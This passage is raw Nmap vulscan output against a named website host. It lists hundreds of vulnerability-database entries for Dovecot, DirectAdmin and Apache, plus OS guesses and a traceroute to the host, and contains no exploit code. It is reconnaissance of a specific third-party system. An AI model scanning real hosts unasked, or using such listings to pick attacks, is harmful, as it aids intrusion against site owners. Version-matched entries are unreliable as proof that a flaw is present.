3986| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
3987| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
3988| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
3989| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
3990| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
3991| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
3992| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
3993| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
3994| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
3995| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
3996| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
3997| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
3998| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
3999| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
4000| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
4001| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
4002| [39838] tpop3d Remote Denial of Service Vulnerability
4003| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
4004| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
4005| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
4006| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
4007| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
4008| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
4009| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
4010| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
4011| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
4012| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
4013| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
4014| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
4015| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
4016| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
4017| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
4018| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
4019| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
4020| [23254] DirectAdmin Logfile HTML Injection Vulnerability
4021| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
4022| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
4023| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
4024| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
4025| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
4026| [17961] Dovecot Remote Information Disclosure Vulnerability
4027| [16672] Dovecot Double Free Denial of Service Vulnerability
4028| [8495] akpop3d User Name SQL Injection Vulnerability
4029| [8473] Vpop3d Remote Denial Of Service Vulnerability
4030| [3990] ZPop3D Bad Login Logging Failure Vulnerability
4031| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
4032|
4033| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4034| [86382] Dovecot POP3 Service denial of service
4035| [85490] DirectAdmin Backup System email account functionality symlink
4036| [85488] DirectAdmin Backup System symlink
4037| [84396] Dovecot IMAP APPEND denial of service
4038| [80453] Dovecot mail-search.c denial of service
4039| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
4040| [72685] DirectAdmin domain parameter cross-site request forgery
4041| [71354] Dovecot SSL Common Name (CN) weak security
4042| [67675] Dovecot script-login security bypass
4043| [67674] Dovecot script-login directory traversal
4044| [67589] Dovecot header name denial of service
4045| [67254] DirectAdmin MySQL information disclosure
4046| [67253] DirectAdmin hard link privilege escalation
4047| [63267] Apple Mac OS X Dovecot information disclosure
4048| [62340] Dovecot mailbox security bypass
4049| [62339] Dovecot IMAP or POP3 denial of service
4050| [62256] Dovecot mailbox security bypass
4051| [62255] Dovecot ACL entry security bypass
4052| [60639] Dovecot ACL plugin weak security
4053| [57267] Apple Mac OS X Dovecot Kerberos security bypass
4054| [56875] DirectAdmin name cross-site scripting
4055| [56763] Dovecot header denial of service
4056| [55181] DirectAdmin account cross-site request forgery
4057| [54363] Dovecot base_dir privilege escalation
4058| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
4059| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
4060| [50167] DirectAdmin CMD_DB command execution
4061| [49416] DirectAdmin CMD_DB backup action symlink
4062| [46323] Dovecot dovecot.conf information disclosure
4063| [46227] Dovecot message parsing denial of service
4064| [45669] Dovecot ACL mailbox security bypass
4065| [45667] Dovecot ACL plugin rights security bypass
4066| [41085] Dovecot TAB characters authentication bypass
4067| [41009] Dovecot mail_extra_groups option unauthorized access
4068| [39342] Dovecot LDAP auth cache configuration security bypass
4069| [36510] DirectAdmin user parameter cross-site scripting
4070| [35767] Dovecot ACL plugin security bypass
4071| [35177] DirectAdmin domain parameter cross-site scripting
4072| [34082] Dovecot mbox-storage.c directory traversal
4073| [33390] DirectAdmin log file cross-site scripting
4074| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
4075| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
4076| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
4077| [26578] Cyrus IMAP pop3d buffer overflow
4078| [26536] Dovecot IMAP LIST information disclosure
4079| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
4080| [24709] Dovecot APPEND command denial of service
4081| [13018] akpop3d authentication code SQL injection
4082| [7345] Slackware Linux imapd and ipop3d core dump
4083| [6269] imap, ipop2d and ipop3d buffer overflows
4084| [5923] Linuxconf vpop3d symbolic link
4085| [4918] IPOP3D, Buffer overflow attack
4086| [1560] IPOP3D, user login successful
4087| [1559] IPOP3D user login to remote host successful
4088| [1525] IPOP3D, user logout
4089| [1524] IPOP3D, user auto-logout
4090| [1523] IPOP3D, user login failure
4091| [1522] IPOP3D, brute force attack
4092| [1521] IPOP3D, user kiss of death logout
4093| [418] pop3d mktemp creates insecure temporary files
4094|
4095| Exploit-DB - https://www.exploit-db.com:
4096| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
4097| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
4098| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
4099| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
4100| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
4101| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
4102| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
4103| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
4104| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
4105| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
4106| [23053] Vpop3d Remote Denial of Service Vulnerability
4107| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
4108| [11893] tPop3d 1.5.3 DoS
4109| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
4110| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
4111| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
4112| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
4113| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
4114| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
4115| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
4116|
4117| OpenVAS (Nessus) - http://www.openvas.org:
4118| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
4119| [901025] Dovecot Version Detection
4120| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
4121| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
4122| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
4123| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
4124| [870607] RedHat Update for dovecot RHSA-2011:0600-01
4125| [870471] RedHat Update for dovecot RHSA-2011:1187-01
4126| [870153] RedHat Update for dovecot RHSA-2008:0297-02
4127| [863272] Fedora Update for dovecot FEDORA-2011-7612
4128| [863115] Fedora Update for dovecot FEDORA-2011-7258
4129| [861525] Fedora Update for dovecot FEDORA-2007-664
4130| [861394] Fedora Update for dovecot FEDORA-2007-493
4131| [861333] Fedora Update for dovecot FEDORA-2007-1485
4132| [860845] Fedora Update for dovecot FEDORA-2008-9202
4133| [860663] Fedora Update for dovecot FEDORA-2008-2475
4134| [860169] Fedora Update for dovecot FEDORA-2008-2464
4135| [860089] Fedora Update for dovecot FEDORA-2008-9232
4136| [840950] Ubuntu Update for dovecot USN-1295-1
4137| [840668] Ubuntu Update for dovecot USN-1143-1
4138| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
4139| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
4140| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
4141| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
4142| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
4143| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
4144| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
4145| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
4146| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
4147| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
4148| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
4149| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
4150| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
4151| [70259] FreeBSD Ports: dovecot
4152| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
4153| [66522] FreeBSD Ports: dovecot
4154| [65010] Ubuntu USN-838-1 (dovecot)
4155| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
4156| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
4157| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
4158| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
4159| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
4160| [62854] FreeBSD Ports: dovecot-managesieve
4161| [61916] FreeBSD Ports: dovecot
4162| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
4163| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
4164| [60528] FreeBSD Ports: dovecot
4165| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
4166| [60089] FreeBSD Ports: dovecot
4167| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
4168| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
4169|
4170| SecurityTracker - https://www.securitytracker.com:
4171| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
4172| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
4173| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
4174| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
4175|
4176| OSVDB - http://www.osvdb.org:
4177| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
4178| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
4179| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
4180| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
4181| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
4182| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
4183| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
4184| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
4185| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
4186| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
4187| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
4188| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
4189| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
4190| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
4191| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
4192| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
4193| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
4194| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
4195| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
4196| [66113] Dovecot Mail Root Directory Creation Permission Weakness
4197| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
4198| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
4199| [66110] Dovecot Multiple Unspecified Buffer Overflows
4200| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
4201| [64783] Dovecot E-mail Message Header Unspecified DoS
4202| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
4203| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
4204| [62796] Dovecot mbox Format Email Header Handling DoS
4205| [61395] DirectAdmin Admin Account Creation CSRF
4206| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
4207| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
4208| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
4209| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
4210| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
4211| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
4212| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
4213| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
4214| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
4215| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
4216| [43137] Dovecot mail_extra_groups Symlink File Manipulation
4217| [42979] Dovecot passdbs Argument Injection Authentication Bypass
4218| [39876] Dovecot LDAP Auth Cache Security Bypass
4219| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
4220| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
4221| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
4222| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
4223| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
4224| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
4225| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
4226| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
4227| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
4228| [32673] DirectAdmin CMD_TICKET type Parameter XSS
4229| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
4230| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
4231| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
4232| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
4233| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
4234| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
4235| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
4236| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
4237| [23281] Dovecot imap/pop3-login dovecot-auth DoS
4238| [23280] Dovecot Malformed APPEND Command DoS
4239| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
4240| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
4241| [5857] Linux pop3d Arbitrary Mail File Access
4242| [2471] akpop3d username SQL Injection
4243|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 9 hops

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 171.31 ms 10.247.200.1
2 172.57 ms 213.184.122.97
3 171.35 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
4 171.72 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
5 172.02 ms bzq-114-65-2.cust.bezeqint.net (192.114.65.2)
6 237.60 ms linx-224.retn.net (195.66.224.193)
7 234.45 ms linx-224.retn.net (195.66.224.193)
8 ...
9 238.83 ms 89.248.174.131

###########################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:51 EDT
Nmap scan report for idolblog.tv (89.248.174.131)
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2
4269| vulscan: VulDB - https://vuldb.com:
4270| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
4271| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
4272| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
4273| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
4274| [134416] Apache Sanselan 0.97-incubator Loop denial of service
4275| [134415] Apache Sanselan 0.97-incubator Hang denial of service
4276| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
4277| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
4278| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
4279| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
4280| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
4281| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
4282| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
4283| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
4284| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
4285| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
4286| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
4287| [133750] Oracle Agile Recipe Management for Pharmaceuticals 9.3.3/9.3.4 Apache Commons FileUpload unknown vulnerability
4288| [133728] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
4289| [133644] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
4290| [133643] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache HTTP Server denial of service
4291| [133640] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Commons FileUpload unknown vulnerability
4292| [133638] Oracle Healthcare Master Person Index 3.0/4.0 Apache Commons FileUpload unknown vulnerability
4293| [133614] Oracle Data Integrator 12.2.1.3.0 Apache Batik unknown vulnerability
4294| [133594] Oracle WebCenter Portal 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
4295| [133591] Oracle JDeveloper 11.1.1.9.0/12.1.3.0.0/12.2.1.3.0 Apache Log4j unknown vulnerability
4296| [133590] Oracle Identity Analytics 11.1.1.5.8 Apache Commons FileUpload unknown vulnerability
4297| [133588] Oracle Endeca Information Discovery Integrator 3.2.0 Apache Commons FileUpload unknown vulnerability
4298| [133587] Oracle Data Integrator 11.1.1.9.0 Apache Groovy unknown vulnerability
4299| [133585] Oracle API Gateway 11.1.2.4.0 Apache Commons FileUpload unknown vulnerability
4300| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
4301| [133571] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache Commons FileUpload unknown vulnerability
4302| [133522] Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Apache Tomcat unknown vulnerability
4303| [133520] Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Apache HTTP Server denial of service
4304| [133518] Oracle Primavera Unifier up to 18.8 Apache Commons FileUpload unknown vulnerability
4305| [133508] Oracle Communications Instant Messaging Server 10.0.1 Apache Tomcat unknown vulnerability
4306| [133501] Oracle Communications Policy Management 12.1/12.2/12.3/12.4 Apache Struts 1 unknown vulnerability
4307| [133500] Oracle Communications Application Session Controller 3.7.1/3.8.0 Apache Tomcat unknown vulnerability
4308| [133493] Oracle Communications Pricing Design Center 11.1/12.0 Apache Log4j unknown vulnerability
4309| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
4310| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
4311| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
4312| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
4313| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
4314| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
4315| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
4316| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
4317| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
4318| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
4319| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
4320| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
4321| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
4322| [131859] Apache Hadoop up to 2.9.1 privilege escalation
4323| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
4324| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
4325| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
4326| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
4327| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
4328| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
4329| [130629] Apache Guacamole Cookie Flag weak encryption
4330| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
4331| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
4332| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
4333| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
4334| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
4335| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
4336| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
4337| [130123] Apache Airflow up to 1.8.2 information disclosure
4338| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
4339| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
4340| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
4341| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
4342| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4343| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4344| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4345| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
4346| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
4347| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
4348| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
4349| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
4350| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
4351| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
4352| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
4353| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
4354| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
4355| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
4356| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
4357| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
4358| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
4359| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
4360| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
4361| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
4362| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
4363| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
4364| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
4365| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
4366| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
4367| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
4368| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
4369| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
4370| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
4371| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
4372| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
4373| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
4374| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
4375| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
4376| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
4377| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
4378| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
4379| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
4380| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
4381| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
4382| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
4383| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
4384| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
4385| [127007] Apache Spark Request Code Execution
4386| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
4387| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
4388| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
4389| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
4390| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
4391| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
4392| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
4393| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
4394| [126346] Apache Tomcat Path privilege escalation
4395| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
4396| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
4397| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
